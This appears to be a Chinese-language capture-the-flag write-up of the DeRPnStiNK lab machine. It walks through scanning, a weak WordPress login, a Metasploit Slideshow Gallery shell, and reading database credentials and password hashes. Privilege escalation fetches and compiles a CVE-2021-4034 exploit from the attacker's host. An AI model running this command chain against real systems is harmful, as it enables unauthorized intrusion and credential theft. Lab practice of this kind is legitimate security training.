靶机安装
信息收集
靶机IP扫描
nmap 192.168.93.0/24
端口扫描,开放21、22、80端口
nmap -A 192.168.93.158 -p-
目录扫描
dirsearch -u http://192.168.93.158
进行网址访问,页面上只有个单词DeRPnStiNK,先记下来
点击检查,发现第一个flag
又发现存在一个文件/webnotes/info.txt进行访问
翻译一下
是需要更新本地DNS主机文件,思考应该是需要我们把IP和对应的域名进行添加到hosts文件中,但不知道域名是什么
后面拼接扫描出来的目录/php/phpmyadmin/看起来应该是一个可以登录到数据库里面的
拼接/robots.txt
继续访问
我们重新用另一命令进行目录扫描一下,会出现许多上面没有扫出来的目录,
dirb http://192.168.93.158
weblog目录下存在登录页面,测试一下
发现进行了域名跳转到:https://derpnstink.local/weblog/,并且页面加载失败
因此可能前面的DNS更新应该是192.168.93.158与derpnstink.local/weblog/的对应关系添加
通过目录扫描出来的,还有目录//weblog/wp-admin/
尝试弱口令登录,成功 admin/admin
漏洞利用
这个框架是WordPress,进行工具使用 wpscan 扫描,扫描到很多插件存在漏洞
wpscan --url http://derpnstink.local/weblog
使用Slideshow Gallery 存在的漏洞
因为我们知道后台的账户密码,所以我们用msf来进行getshell操作
开启msf环境
msfconsole
search slideshow
use 1
show option
set rhosts 192.168.93.158
set targeturi /weblog/ #设置目标的url目录地址
set wp_user admin
set wp_password admin
run
先将获取到的shell转变为交互式的shell
shell
python -c 'import pty; pty.spawn("/bin/bash")' # 获得交互式命令行
翻看配置文件,发现了目标数据库的账号和密码
cd /var/www/html/weblog
ls
cat wp-config.php
root:mysql
是数据库的账号和密码,回到页面进行登录,登录成功
访问 wp_posts 表发现 flag2.txt
在 wp_users 表发现两个账户密码
unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/破解之后是wedgie57
在靶机home目录下发现两个用户,mrderp/stinky
尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57
成功切换到stinky用户,进入到stinky目录并查看当前目录的所有文件
在Desktop目录发现了flag3
提权
观察到ubuntu版本是14.04,可能存在一个漏洞。
我刚开始用的是kali上面的searchsploit工具命令进行搜索版本利用搜索出来的脚本文件,但失败了,也可能是利用的脚本不对,大家可以多尝试几个脚本,看看能否成功,也希望与大家讨论
我在这找了一个有关版本的相关提权文件,有一个本地提权漏洞CVE-2021-4034, 作用有点类似于sudo,允许用户以另一个用户身份执行命令
#这个提权漏洞利用脚本下载地址
https://github.com/arthepsy/CVE-2021-4034
将这个文件下载下来,复制到kali里面,并挂到服务上面
在反弹的交互式shell中,必须要进入tmp目录,否则无法下载
从kali的web端wget下来cve-2021-4034-poc.c,将其gcc编译输出。然后复权运行,即可提权成功。
#下载命令
wget http://192.168.93.130:8000/cve-2021-4034-poc.c
#下载完成之后,权限修改
chmod +x cve-2021-4034-poc.c
#编译脚本
gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt
进行这个脚本运行,提权成功
1200
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
